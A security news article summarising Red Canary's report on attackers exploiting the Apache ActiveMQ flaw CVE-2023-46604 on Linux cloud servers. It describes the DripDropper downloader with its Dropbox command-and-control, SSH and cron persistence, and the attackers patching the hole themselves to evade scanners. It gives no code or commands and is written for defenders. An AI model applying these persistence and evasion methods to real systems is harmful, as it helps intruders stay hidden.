How Attackers Exploit and Then Patch a Vulnerability to Hide in Linux Systems

Red Canary has revealed a sophisticated attack campaign targeting cloud-based Linux systems through a critical remote code execution flaw in Apache ActiveMQ (CVE-2023-46604). The campaign showcases how adversaries combine known vulnerabilities, stealthy malware, and even self-patching techniques to maintain persistence and avoid detection.

CVE-2023-46604, a widely exploited flaw in ActiveMQ, has been linked to ransomware families such as TellYouThePass, Ransomhub, and HelloKitty, as well as the Linux-focused cryptominer Kinsing.

In this campaign, attackers used the vulnerability to gain initial access before deploying post-exploitation frameworks like Sliver and covert communication channels via Cloudflare Tunnels. In one case, after establishing access, the adversary modified SSH configurations:

“After exploiting the endpoint and installing the Sliver implant… they modified the existing sshd configuration file to enable root login.”

This step granted remote access with the highest privileges, setting the stage for deeper persistence.

One of the most significant findings was the identification of a new downloader, dubbed DripDropper.

“DripDropper is an encrypted PyInstaller ELF file… It communicates with an adversary-controlled Dropbox account using a hardcoded bearer token.”

DripDropper typically created two malicious files:

• The first, dependent on execution arguments, could perform actions from process monitoring to reaching out to Dropbox for further instructions.
• The second, with a randomly generated eight-character name, frequently altered SSH configuration files, including changing the default shell of the games account to /bin/sh, effectively enabling hidden persistence.

Persistence was reinforced by editing system cron jobs (/etc/cron.*/0anacron).

Attackers downloaded legitimate Apache Maven JAR files containing the patch for CVE-2023-46604—then replaced the vulnerable files on compromised servers.

“By deleting the existing JAR files and replacing them, the adversary effectively patched the already compromised system.”

Red Canary assessed this tactic as a way to evade scanners and other adversaries, since patching does not disrupt already established persistence.

The report highlights how adversaries increasingly rely on public platforms for command-and-control (C2).

“The usage of public platforms like Discord, Telegram, and Dropbox for C2 communications has proven to be an effective technique for blending in.”

This trend complicates detection, as traffic blends with normal cloud application use.

Related Posts:

• Android Canary: Google’s New Path to Early Access Features
• Android Now Runs Full Graphical Linux Apps: Google Unleashes Desktop Experience in Terminal VM
• Cybereason Uncovers Widespread Exploitation of Apache ActiveMQ Vulnerability
• CVE-2023-46604: Apache ActiveMQ Remote Code Execution Vulnerability